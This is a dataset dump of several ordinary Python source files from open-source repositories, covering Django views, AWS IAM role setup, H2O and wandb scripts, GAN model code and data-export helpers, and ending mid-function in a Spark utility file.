max_stars_repo_path (string, length 4-245) | max_stars_repo_name (string, length 7-115) | max_stars_count (int64, 101-368k) | id (string, length 2-8) | content (string, length 6-1.03M)
---|---|---|---|---|
lmgtfy/views.py | opendata/LMGTDFY | 120 | 11155251 | import csv
from django.contrib import messages
from django.shortcuts import HttpResponseRedirect, resolve_url, HttpResponse
from django.views.generic import FormView, ListView
from lmgtfy.forms import MainForm
from lmgtfy.helpers import search_bing, check_valid_tld
from lmgtfy.models import Domain, DomainSearch, DomainSearchResult
class MainView(FormView):
template_name = 'main.html'
form_class = MainForm
success_url = '.'
def get_context_data(self, **kwargs):
context = super(MainView, self).get_context_data(**kwargs)
domains_and_latest_counts = []
for domain in Domain.objects.order_by("-id")[:50]:
domain_search_latest = domain.domainsearch_set.all().last()
if not domain_search_latest:
continue
count = domain_search_latest.domainsearchresult_set.count()
domains_and_latest_counts.append((domain.name, count))
context['table_data'] = domains_and_latest_counts
return context
def form_valid(self, form):
data = form.cleaned_data
domain = data['domain_base']
domain_is_whitelisted = check_valid_tld(domain)
if not domain_is_whitelisted:
messages.info(
self.request,
"Sorry, but to limit the cost of running this service, we have not enabled searching this domain name (%s)." % domain
)
return HttpResponseRedirect(resolve_url('home'))
search_done = search_bing(domain)
if not search_done:
messages.info(
self.request,
"This domain has already been requested today! Here is what we've gathered."
)
else:
messages.info(
self.request,
"Gathering results now. They will be displayed shortly."
)
return HttpResponseRedirect(
resolve_url('domain_result', domain)
)
main_view = MainView.as_view()
class SearchResultView(ListView):
template_name = 'result.html'
model = DomainSearchResult
success_url = '.'
def get_queryset(self):
qs = super(SearchResultView, self).get_queryset()
try:
domain = self.kwargs['domain']
fmt = self.kwargs.get('fmt')
        except KeyError:
            raise Exception('Invalid URL parameter has been passed.')
qs = qs.filter(
search_instance__domain__name=domain
).order_by('result')
if fmt:
qs = qs.filter(fmt=fmt)
return qs
def get_context_data(self, **kwargs):
context = super(SearchResultView, self).get_context_data(**kwargs)
domain_name = self.kwargs['domain']
context['domain_name'] = domain_name
context['format'] = self.kwargs.get('fmt')
self.kwargs['fmt'] = None # clear the format
# so that we get a list of all of the formats for the domain
qs = set(self.get_queryset().values_list('fmt', flat=True))
context['file_formats'] = list(qs)
domain = Domain.objects.filter(name=domain_name)
        search_being_performed = DomainSearch.objects.filter(
            domain=domain, completed_at=None
        ).exists()
if search_being_performed:
messages.info(
self.request,
"We're gathering more results right now. This page will refresh in 10 seconds."
)
context['refresh_counter'] = 10
return context
search_result_view = SearchResultView.as_view()
def get_csv(request, domain):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="%s.csv"' % domain
writer = csv.writer(response)
qs = DomainSearchResult.objects.filter(
search_instance__domain__name=domain
).order_by('result').distinct()
writer.writerow(["title", "format", "kilobyte_size", "url"])
for result in qs:
writer.writerow([result.title.encode("utf-8"), result.fmt.encode("utf-8"),
result.size, result.result.encode("utf-8")])
return response
|
modules/aws_iam_role/aws_iam_role.py | riddopic/opta | 595 | 11155263 | from typing import TYPE_CHECKING
from modules.base import AWSIamAssembler, ModuleProcessor, get_eks_module_refs
from opta.exceptions import UserErrors
if TYPE_CHECKING:
from opta.layer import Layer
from opta.module import Module
class AwsIamRoleProcessor(ModuleProcessor, AWSIamAssembler):
def __init__(self, module: "Module", layer: "Layer"):
if module.data["type"] != "aws-iam-role":
raise Exception(
f"The module {module.name} was expected to be of type aws iam role"
)
super(AwsIamRoleProcessor, self).__init__(module, layer)
def process(self, module_idx: int) -> None:
self.handle_iam_policy(module_idx)
self.handle_k8s_trusts(module_idx)
if (
self.module.data.get("allowed_k8s_services", []) == []
and self.module.data.get("allowed_iams", []) == []
):
raise UserErrors(
"AWS Iam role needs to trust either a k8s service or some other role or user."
)
super(AwsIamRoleProcessor, self).process(module_idx)
def handle_k8s_trusts(self, module_idx: int) -> None:
allowed_k8s_services = self.module.data.get("allowed_k8s_services", [])
if allowed_k8s_services != []:
eks_module_refs = get_eks_module_refs(self.layer, module_idx)
self.module.data["kubernetes_trusts"] = [
{
"open_id_url": eks_module_refs[0],
"open_id_arn": eks_module_refs[1],
"service_name": allowed_k8s_service["service_name"],
"namespace": allowed_k8s_service["namespace"],
}
for allowed_k8s_service in allowed_k8s_services
]
def handle_iam_policy(self, module_idx: int) -> None:
iam_statements = [
{
"Sid": "PolicySimulatorAPI",
"Action": [
"iam:GetContextKeysForCustomPolicy",
"iam:GetContextKeysForPrincipalPolicy",
"iam:SimulateCustomPolicy",
"iam:SimulatePrincipalPolicy",
],
"Effect": "Allow",
"Resource": "*",
},
{
"Sid": "PolicySimulatorConsole",
"Action": [
"iam:GetGroup",
"iam:GetGroupPolicy",
"iam:GetPolicy",
"iam:GetPolicyVersion",
"iam:GetRole",
"iam:GetRolePolicy",
"iam:GetUser",
"iam:GetUserPolicy",
"iam:ListAttachedGroupPolicies",
"iam:ListAttachedRolePolicies",
"iam:ListAttachedUserPolicies",
"iam:ListGroups",
"iam:ListGroupPolicies",
"iam:ListGroupsForUser",
"iam:ListRolePolicies",
"iam:ListRoles",
"iam:ListUserPolicies",
"iam:ListUsers",
],
"Effect": "Allow",
"Resource": "*",
},
]
# Handle links
for link_data in self.module.data.get("links", []):
if type(link_data) is str:
target_module_name = link_data
link_permissions = []
elif type(link_data) is dict:
target_module_name = list(link_data.keys())[0]
link_permissions = list(link_data.values())[0]
else:
raise UserErrors(
f"Link data {link_data} must be a string or map holding the permissions"
)
module = self.layer.get_module(target_module_name, module_idx)
if module is None:
raise Exception(
f"Did not find the desired module {target_module_name} "
"make sure that the module you're referencing is listed before the k8s "
"app one"
)
module_type = module.data["type"]
# TODO: Add support for SNS, SQS, KINESIS,
if module_type == "aws-s3":
self.handle_s3_link(module, link_permissions)
elif module_type == "aws-sqs":
self.handle_sqs_link(module, link_permissions)
elif module_type == "aws-sns":
self.handle_sns_link(module, link_permissions)
elif module_type == "aws-dynamodb":
self.handle_dynamodb_link(module, link_permissions)
else:
raise Exception(
f"Unsupported module type for k8s service link: {module_type}"
)
iam_statements += self.prepare_iam_statements()
self.module.data["iam_policy"] = {
"Version": "2012-10-17",
"Statement": iam_statements,
}
|
h2o-py/tests/testdir_algos/gam/pyunit_PUBDEV_7367_gridsearch_subspaces_invalid.py | vishalbelsare/h2o-3 | 6,098 | 11155265 | from __future__ import division
from __future__ import print_function
from past.utils import old_div
import sys
sys.path.insert(1, "../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gam import H2OGeneralizedAdditiveEstimator
from h2o.grid.grid_search import H2OGridSearch
# In this test, we check to make sure that a grid search on a GAM with hyperparameters and subspaces fails.
# The grid search should fail because gam_columns is specified in both the hyper parameters and the constrained hyper parameters.
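# For contrast, a sketch of a specification that avoids the clash (an illustration
# added here, not taken from the original test) keeps gam_columns only inside the
# subspaces entry:
#     {'subspaces': [{'scale': [[1, 1, 1], [2, 2, 2]],
#                     'gam_columns': [["C11", "C12", "C13"]]}]}
# The dictionary used below repeats gam_columns at the top level as well, which is
# exactly what this test expects H2OGridSearch to reject.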
class test_gam_gridsearch_specific:
h2o_data = []
myX = []
myY = []
search_criteria = {'strategy': 'Cartesian'}
hyper_parameters = {'gam_columns': [["C11", "C12", "C13"]],
'subspaces': [{'scale': [[1, 1, 1], [2, 2, 2]], 'gam_columns': [["C11", "C12", "C13"]]}]}
h2o_model = []
def __init__(self):
self.setup_data()
def setup_data(self):
"""
This function performs all initializations necessary:
load the data sets and set the training set indices and response column index
"""
self.h2o_data = h2o.import_file(
path=pyunit_utils.locate("smalldata/glm_test/gaussian_20cols_10000Rows.csv"))
self.h2o_data["C1"] = self.h2o_data["C1"].asfactor()
self.h2o_data["C2"] = self.h2o_data["C2"].asfactor()
self.myX = ["C1", "C2"]
self.myY = "C21"
def train_models(self):
try:
self.h2o_model = H2OGridSearch(H2OGeneralizedAdditiveEstimator(
family="gaussian", keep_gam_cols=True), self.hyper_parameters, search_criteria=self.search_criteria)
self.h2o_model.train(x=self.myX, y=self.myY, training_frame=self.h2o_data)
except:
print("Error was raised because gam_columns was specified in hyper parameters and constrained hyper parameters")
else:
raise Exception("No errors raised despite gam_columns being in hyper parameters and constrained hyper parameters")
def test_gridsearch_specific():
test_gam_grid = test_gam_gridsearch_specific()
test_gam_grid.train_models()
if __name__ == "__main__":
pyunit_utils.standalone_test(test_gridsearch_specific)
else:
test_gridsearch_specific()
|
standalone_tests/offline_sync_train.py | borisgrafx/client | 3,968 | 11155342 | import wandb
wandb.init(mode="offline", config=dict(init1=11, init2=22))
wandb.config.extra3 = 33
wandb.log(dict(this="that"))
wandb.log(dict(yes=2))
|
Sobolev/make_gif.py | inamori/DeepLearningImplementations | 2,010 | 11155346 | import glob
import shlex
import subprocess
from natsort import natsorted
list_files = glob.glob("figures/*")
list_files_20pts = natsorted([f for f in list_files if "20_npts" in f])
list_files_100pts = natsorted([f for f in list_files if "100_npts" in f])
str_20pts = " ".join(list_files_20pts)
str_100pts = " ".join(list_files_100pts)
cmd = "convert -delay 80 -resize 600x600 -loop 0 %s figures/tang_20pts.gif" % str_20pts
subprocess.call(shlex.split(cmd))
cmd = "convert -delay 80 -resize 600x600 -loop 0 %s figures/tang_100pts.gif" % str_100pts
subprocess.call(shlex.split(cmd))
|
python/cogs/extra/chase.py | dev-null-undefined/felix | 135 | 11155374 | """This is a cog for a discord.py bot.
it prints out either a random or specified chase pic,
the guide to those chase pics and some additional resources.
Commands:
chase
├ num print a specific chase pic
└ random prints a random chase pic
"""
import re
from random import choice
from discord.ext import commands, tasks
#pylint: disable=E1101
class Chase(commands.Cog, name='Chase'):
def __init__(self, client):
self.client = client
self.load_chase_pics.start()
self.all_pictures = {}
self.unseen_pictures = []
@tasks.loop(hours=24)
async def load_chase_pics(self):
url = "https://mydogchase.com"
async with self.client.session.get(url) as res:
text = await res.text()
r = re.findall(r'/public/chase/.*\.jpg', text)
self.all_pictures = {i: f'{url}{pic}' for i, pic in enumerate(sorted(r))}
def cog_unload(self):
self.load_chase_pics.cancel()
async def post_chase_pic(self, ctx, num=0, random=False):
#await ctx.trigger_typing()
if len(self.all_pictures) == 0:
raise commands.BadArgument(f"No Chase pics available")
if random:
if not self.unseen_pictures:
self.unseen_pictures = list(range(len(self.all_pictures)))
num = choice(self.unseen_pictures)
self.unseen_pictures.remove(num)
else:
if not 0 <= num < len(self.all_pictures):
raise commands.BadArgument(f"Choose number from `0-{len(self.all_pictures)-1}`")
await ctx.send(f'Picture #{num}: {self.all_pictures[num]}')
@commands.group(
invoke_without_command=True,
name='chase',
)
async def chase_pic(self, ctx, num: int):
"""'Show a specific chase pic'"""
await self.post_chase_pic(ctx, num=num)
@chase_pic.command(
name='random',
aliases=['r'],
)
async def random_chase_pic(self, ctx):
"""Randomly choose a chase pic"""
await self.post_chase_pic(ctx, random=True)
def setup(client):
"""This is called when the cog is loaded via load_extension"""
client.add_cog(Chase(client))
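# Loading sketch (kept as a comment; the dotted path is an assumption based on this
# file living at python/cogs/extra/chase.py, not something the file defines):
#
#     client.load_extension('cogs.extra.chase')
#
# discord.py then imports this module and calls setup(client) above.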
|
src/users/migrations/0005_UserUUID.py | denkasyanov/education-backend | 151 | 11155410 | # Generated by Django 3.1.8 on 2021-05-01 23:33
import uuid
from django.db import migrations, models
def set_random_uuid_for_all_users(apps, schema_editor):
for user in apps.get_model('users.User').objects.filter(uuid__isnull=True).iterator():
user.uuid = uuid.uuid4()
user.save(update_fields=['uuid'])
class Migration(migrations.Migration):
dependencies = [
('users', '0004_NamesInEnglish'),
]
operations = [
migrations.AddField(
model_name='user',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.RunPython(set_random_uuid_for_all_users),
migrations.AlterField(
model_name='user',
name='uuid',
field=models.UUIDField(db_index=True, default=uuid.uuid4, unique=True),
),
]
|
utils/report.py | WuDiDaBinGe/TAKG | 130 | 11155425 | import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import numpy as np
def export_train_and_valid_reward(train_reward, valid_reward, plot_every, path):
# Export the results to a csv file
labels = ['Training reward:,', 'Validation reward:,']
float_lists = [train_reward, valid_reward]
with open(path + '.csv', 'w') as result_csv:
for i in range(len(labels)):
result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\n')
# Export the plots to pdf file
plot_train_valid_curve(train_reward, valid_reward, plot_every, path, 'Reward')
def export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path):
"""
:param train_loss: a list of float
:param valid_loss: a list of float
:param train_ppl: a list of float
:param valid_ppl: a list of float
:param plot_every: int
:param path: str
:return:
"""
# Export the results to a csv file
labels = ['Training loss:,', 'Validation loss:,', 'Training perplexity:,', 'Validation Perplexity:,']
float_lists = [train_loss, valid_loss, train_ppl, valid_ppl]
with open(path + '.csv', 'w') as result_csv:
for i in range(len(labels)):
result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\n')
# Export the plots to pdf file
plot_train_valid_curve(train_loss, valid_loss, plot_every, path, 'Loss')
plot_train_valid_curve(train_ppl, valid_ppl, plot_every, path, 'Perplexity')
def concat_float_list(values, delimiter=','):
    return delimiter.join([str(v) for v in values])
def plot_train_valid_curve(train_loss, valid_loss, plot_every, path, loss_label):
#plt.ioff()
title = "Training and validation %s for every %d iterations" % (loss_label.lower(), plot_every)
plt.figure()
plt.title(title)
plt.xlabel("Checkpoints")
plt.ylabel(loss_label)
num_checkpoints = len(train_loss)
X = list(range(num_checkpoints))
plt.plot(X, train_loss, label="training")
plt.plot(X, valid_loss, label="validation")
plt.legend()
plt.savefig("%s_%s.pdf" % (path, loss_label.lower()))
if __name__ == '__main__':
train_loss = [20.1,15.3,12.3,11.0,10.0]
valid_loss = [30.2,29.2,25.2,21.3,20.2]
train_ppl = [10.1,5.3,2.3,1.0,1.0]
valid_ppl = [20.2,19.2,15.2,11.3,10.2]
plot_every = 4000
path = '../exp/debug/valid_train_curve'
export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path)
|
models/SelectionGAN/person_transfer/models/model_variants.py | xianjian-xie/pose-generation | 445 | 11155431 | import torch.nn as nn
import functools
import torch
import functools
import torch.nn.functional as F
class PATBlock(nn.Module):
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False):
super(PATBlock, self).__init__()
self.conv_block_stream1 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=False)
self.conv_block_stream2 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=True, cated_stream2=cated_stream2)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False, cal_att=False):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim*2, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim*2),
nn.ReLU(True)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
nn.ReLU(True)]
if use_dropout:
conv_block += [nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cal_att:
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x1, x2):
# change here
x1_out = self.conv_block_stream1(x1)
x2_out = self.conv_block_stream2(x2)
# att = F.sigmoid(x2_out)
att = torch.sigmoid(x2_out)
x1_out = x1_out * att
out = x1 + x1_out # residual connection
# stream2 receive feedback from stream1
x2_out = torch.cat((x2_out, out), 1)
return out, x2_out, x1_out
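# Shape sketch for PATBlock (an added illustration, not code from the repo), kept as
# a comment so importing this module stays side-effect free. With cated_stream2=False
# both streams take `dim`-channel inputs:
#
#     block = PATBlock(dim=64, padding_type='reflect',
#                      norm_layer=nn.BatchNorm2d, use_dropout=False,
#                      use_bias=False, cated_stream2=False)
#     x1 = torch.randn(2, 64, 32, 16)   # appearance stream
#     x2 = torch.randn(2, 64, 32, 16)   # pose/attention stream
#     out, x2_out, x1_out = block(x1, x2)
#     # out:    [2, 64, 32, 16]   residual output fed back to stream 1
#     # x2_out: [2, 128, 32, 16]  stream-2 features concatenated with out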
class PATNModel(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
assert(n_blocks >= 0 and type(input_nc) == list)
super(PATNModel, self).__init__()
self.input_nc_s1 = input_nc[0]
self.input_nc_s2 = input_nc[1]
self.output_nc = output_nc
self.ngf = ngf
self.gpu_ids = gpu_ids
if type(norm_layer) == functools.partial:
use_bias = norm_layer.func == nn.InstanceNorm2d
else:
use_bias = norm_layer == nn.InstanceNorm2d
# down_sample
model_stream1_down = [nn.ReflectionPad2d(3),
nn.Conv2d(self.input_nc_s1, ngf, kernel_size=7, padding=0,
bias=use_bias),
norm_layer(ngf),
nn.ReLU(True)]
model_stream2_down = [nn.ReflectionPad2d(3),
nn.Conv2d(self.input_nc_s2, ngf, kernel_size=7, padding=0,
bias=use_bias),
norm_layer(ngf),
nn.ReLU(True)]
# n_downsampling = 2
for i in range(n_downsampling):
mult = 2**i
model_stream1_down += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3,
stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2),
nn.ReLU(True)]
model_stream2_down += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3,
stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2),
nn.ReLU(True)]
# att_block in place of res_block
mult = 2**n_downsampling
cated_stream2 = [True for i in range(n_blocks)]
cated_stream2[0] = False
attBlock = nn.ModuleList()
for i in range(n_blocks):
attBlock.append(PATBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout, use_bias=use_bias, cated_stream2=cated_stream2[i]))
# up_sample
model_stream1_up = []
for i in range(n_downsampling):
mult = 2**(n_downsampling - i)
model_stream1_up += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),
kernel_size=3, stride=2,
padding=1, output_padding=1,
bias=use_bias),
norm_layer(int(ngf * mult / 2)),
nn.ReLU(True)]
model_stream1_up2 = []
model_stream1_up2 += [nn.ReflectionPad2d(3)]
model_stream1_up2 += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]
model_stream1_up2 += [nn.Tanh()]
# self.model = nn.Sequential(*model)
self.stream1_down = nn.Sequential(*model_stream1_down)
self.stream2_down = nn.Sequential(*model_stream2_down)
# self.att = nn.Sequential(*attBlock)
self.att = attBlock
self.stream1_up = nn.Sequential(*model_stream1_up)
self.stream1_up2 = nn.Sequential(*model_stream1_up2)
def forward(self, input): # x from stream 1 and stream 2
# here x should be a tuple
x1, x2 = input
# down_sample
x1 = self.stream1_down(x1)
x2 = self.stream2_down(x2)
# att_block
for model in self.att:
x1, x2, _ = model(x1, x2)
# up_sample
feature = self.stream1_up(x1)
x1 = self.stream1_up2(feature)
# print('feature', feature.size()) [32, 64, 128, 64]
# print('x1', x1.size()) [32, 3, 128, 64]
return x1, feature
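# Shape sketch for PATNModel (an added illustration; the 3/36 channel split is an
# assumed example, not a value fixed by this file). Kept as a comment so the module
# has no import-time side effects:
#
#     net = PATNModel(input_nc=[3, 36], output_nc=3, ngf=64)
#     img  = torch.randn(2, 3, 128, 64)    # stream 1: image
#     pose = torch.randn(2, 36, 128, 64)   # stream 2: pose maps
#     x1, feature = net((img, pose))
#     # x1:      [2, 3, 128, 64]   generated image
#     # feature: [2, 64, 128, 64]  pre-output features (see the comments above)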
class SelectionGANModel(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
assert(n_blocks >= 0 and type(input_nc) == list)
super(SelectionGANModel, self).__init__()
self.input_nc_s1 = input_nc[0]
self.input_nc_s2 = input_nc[1]
self.output_nc = output_nc
self.ngf = ngf
self.gpu_ids = gpu_ids
self.pool1 = nn.AvgPool2d(kernel_size=(1, 1))
self.pool2 = nn.AvgPool2d(kernel_size=(4, 4))
self.pool3 = nn.AvgPool2d(kernel_size=(9, 9))
        self.conv106 = nn.Conv2d(106*4, 106, kernel_size=3, stride=1, padding=1, bias=True)
self.model_attention = nn.Conv2d(106, 10, kernel_size=1, stride=1, padding=0)
self.model_image = nn.Conv2d(106, 30, kernel_size=3, stride=1, padding=1)
self.tanh = torch.nn.Tanh()
self.convolution_for_attention = torch.nn.Conv2d(10, 1, 1, stride=1, padding=0)
def forward(self, input): # x from stream 1 and stream 2
# input: [32, 106, 128, 64]
pool_feature1 = self.pool1(input)
pool_feature2 = self.pool2(input)
pool_feature3 = self.pool3(input)
b, c, h, w = input.size()
pool_feature1_up = F.upsample(input=pool_feature1, size=(h, w), mode='bilinear', align_corners=True)
pool_feature2_up = F.upsample(input=pool_feature2, size=(h, w), mode='bilinear', align_corners=True)
pool_feature3_up = F.upsample(input=pool_feature3, size=(h, w), mode='bilinear', align_corners=True)
f1 = input * pool_feature1_up
f2 = input * pool_feature2_up
f3 = input * pool_feature3_up
feature_image_combine = torch.cat((f1, f2, f3, input), 1) # feature_image_combine: 106*4
feature_image_combine = self.conv106(feature_image_combine) # feature_image_combine: 106
attention = self.model_attention(feature_image_combine) # attention: 10
image = self.model_image(feature_image_combine) # image: 30
softmax_ = torch.nn.Softmax(dim=1)
attention = softmax_(attention)
attention1_ = attention[:, 0:1, :, :]
attention2_ = attention[:, 1:2, :, :]
attention3_ = attention[:, 2:3, :, :]
attention4_ = attention[:, 3:4, :, :]
attention5_ = attention[:, 4:5, :, :]
attention6_ = attention[:, 5:6, :, :]
attention7_ = attention[:, 6:7, :, :]
attention8_ = attention[:, 7:8, :, :]
attention9_ = attention[:, 8:9, :, :]
attention10_ = attention[:, 9:10, :, :]
attention1 = attention1_.repeat(1, 3, 1, 1)
attention2 = attention2_.repeat(1, 3, 1, 1)
attention3 = attention3_.repeat(1, 3, 1, 1)
attention4 = attention4_.repeat(1, 3, 1, 1)
attention5 = attention5_.repeat(1, 3, 1, 1)
attention6 = attention6_.repeat(1, 3, 1, 1)
attention7 = attention7_.repeat(1, 3, 1, 1)
attention8 = attention8_.repeat(1, 3, 1, 1)
attention9 = attention9_.repeat(1, 3, 1, 1)
attention10 = attention10_.repeat(1, 3, 1, 1)
image = self.tanh(image)
image1 = image[:, 0:3, :, :]
image2 = image[:, 3:6, :, :]
image3 = image[:, 6:9, :, :]
image4 = image[:, 9:12, :, :]
image5 = image[:, 12:15, :, :]
image6 = image[:, 15:18, :, :]
image7 = image[:, 18:21, :, :]
image8 = image[:, 21:24, :, :]
image9 = image[:, 24:27, :, :]
image10 = image[:, 27:30, :, :]
output1 = image1 * attention1
output2 = image2 * attention2
output3 = image3 * attention3
output4 = image4 * attention4
output5 = image5 * attention5
output6 = image6 * attention6
output7 = image7 * attention7
output8 = image8 * attention8
output9 = image9 * attention9
        output10 = image10 * attention10
final = output1 + output2 + output3 + output4 + output5 + output6 + output7 + output8 + output9 + output10
# print('final', final.size()) [32, 3, 128, 64]
sigmoid_ = torch.nn.Sigmoid()
uncertainty = self.convolution_for_attention(attention)
uncertainty = sigmoid_(uncertainty)
uncertainty_map = uncertainty.repeat(1, 3, 1, 1)
return final, uncertainty_map
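# Shape sketch for SelectionGANModel (an added illustration; input_nc only needs to
# be a list here, and the 106-channel input matches the comment above):
#
#     sel = SelectionGANModel(input_nc=[106, 0], output_nc=3)
#     feat = torch.randn(2, 106, 128, 64)
#     final, uncertainty_map = sel(feat)
#     # final:           [2, 3, 128, 64]  weighted sum of the 10 intermediate images
#     # uncertainty_map: [2, 3, 128, 64]  sigmoid attention summary repeated to 3 channels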
class PATNetwork(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
super(PATNetwork, self).__init__()
assert type(input_nc) == list and len(input_nc) == 2, 'The AttModule take input_nc in format of list only!!'
self.gpu_ids = gpu_ids
self.model = PATNModel(input_nc, output_nc, ngf, norm_layer, use_dropout, n_blocks, gpu_ids, padding_type, n_downsampling=n_downsampling)
def forward(self, input):
if self.gpu_ids and isinstance(input[0].data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
else:
return self.model(input)
class SelectionGANNetwork(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
super(SelectionGANNetwork, self).__init__()
# assert type(input_nc) == list and len(input_nc) == 2, 'The AttModule take input_nc in format of list only!!'
self.gpu_ids = gpu_ids
self.model = SelectionGANModel(input_nc, output_nc, ngf, norm_layer, use_dropout, n_blocks, gpu_ids, padding_type, n_downsampling=n_downsampling)
def forward(self, input):
if self.gpu_ids and isinstance(input[0].data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
else:
return self.model(input)
|
src/GridCal/Engine/IO/sqlite_interface.py | mzy2240/GridCal | 284 | 11155432 | # This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
import sqlite3
import numpy as np
from GridCal.Engine.basic_structures import Logger
from GridCal.Engine.Core.multi_circuit import MultiCircuit
from GridCal.Engine.IO.excel_interface import check_names
from GridCal.Engine.IO.generic_io_functions import parse_config_df
def save_data_frames_to_sqlite(dfs, file_path, text_func=None, progress_func=None):
"""
Save the circuit information in excel format
:param dfs: list of DataFrames
:param file_path: path to the excel file
:return: logger with information
"""
logger = Logger()
conn = sqlite3.connect(file_path)
n = len(dfs.keys())
for i, key in enumerate(dfs.keys()):
if progress_func is not None:
progress_func((i + 1) / n * 100)
if text_func is not None:
text_func('Saving ' + key)
dfs[key].to_sql(key, conn, if_exists='replace', index=False)
return logger
def open_data_frames_from_sqlite(file_path, text_func=None, progress_func=None):
# make connection
conn = sqlite3.connect(file_path)
dfs = dict()
# get the table names
tables = conn.execute("SELECT name FROM sqlite_master WHERE type='table';")
names = [t[0] for t in tables]
check_names(names)
n = len(names)
for i, key in enumerate(names):
if progress_func is not None:
progress_func((i + 1) / n * 100)
if text_func is not None:
text_func('select * from ' + key)
dfs[key] = pd.read_sql('select * from ' + key, conn)
# parse the configuration
dfs = parse_config_df(dfs['config'], dfs)
return dfs
if __name__ == '__main__':
import time
from GridCal.Engine.IO.file_handler import *
from GridCal.Engine.IO.pack_unpack import create_data_frames, data_frames_to_circuit
# fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/1354 Pegase.xlsx'
fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/IEEE39.gridcal'
a = time.time()
circuit_ = FileOpen(fname).open()
print('native based open:', time.time() - a)
print('Saving .sqlite ...')
    dfs = create_data_frames(circuit=circuit_)
save_data_frames_to_sqlite(dfs, file_path=circuit_.name + '.sqlite')
a = time.time()
data = open_data_frames_from_sqlite(circuit_.name + '.sqlite')
circuit2 = data_frames_to_circuit(data)
print('sql based open:', time.time() - a)
|
optimus/helpers/functions_spark.py | liRONCO11/optimus | 1,045 | 11155436 | from functools import reduce
from optimus.helpers.core import val_to_list
from optimus.helpers.functions import random_int
from optimus.helpers.raiseit import RaiseIt
from optimus.infer import is_
def traverse(obj, path=None, callback=None):
"""
Traverse a deep nested python structure
:param obj: object to traverse
:param path:
:param callback: Function used to transform a value
:return:
"""
from pyspark.ml.linalg import DenseVector
if path is None:
path = []
if is_(obj, dict):
value = {k: traverse(v, path + [k], callback)
for k, v in obj.items()}
elif is_(obj, list):
value = [traverse(elem, path + [[]], callback)
for elem in obj]
elif is_(obj, tuple):
value = tuple(traverse(elem, path + [[]], callback)
for elem in obj)
elif is_(obj, DenseVector):
value = DenseVector([traverse(elem, path + [[]], callback) for elem in obj])
else:
value = obj
if callback is None: # if a callback is provided, call it to get the new value
return value
else:
return callback(path, value)
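# A minimal usage sketch (an added illustration, kept as a comment). The callback
# receives (path, value) for every node, containers included, and returns the
# transformed value:
#
#     nested = {"a": [1, 2, {"b": 3}]}
#     doubled = traverse(nested, callback=lambda path, value:
#                        value * 2 if isinstance(value, int) else value)
#     # doubled == {"a": [2, 4, {"b": 6}]}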
def append(dfs, like="columns"):
"""
Concat multiple dataFrames columns or rows wise
:param dfs: List of DataFrames
:param like: concat as columns or rows
:return:
"""
# FIX: Because monotonically_increasing_id can create different
# sequence for different dataframes the result could be wrong.
if like == "columns":
temp_dfs = []
col_temp_name = "id_" + random_int()
dfs = val_to_list(dfs)
for df in dfs:
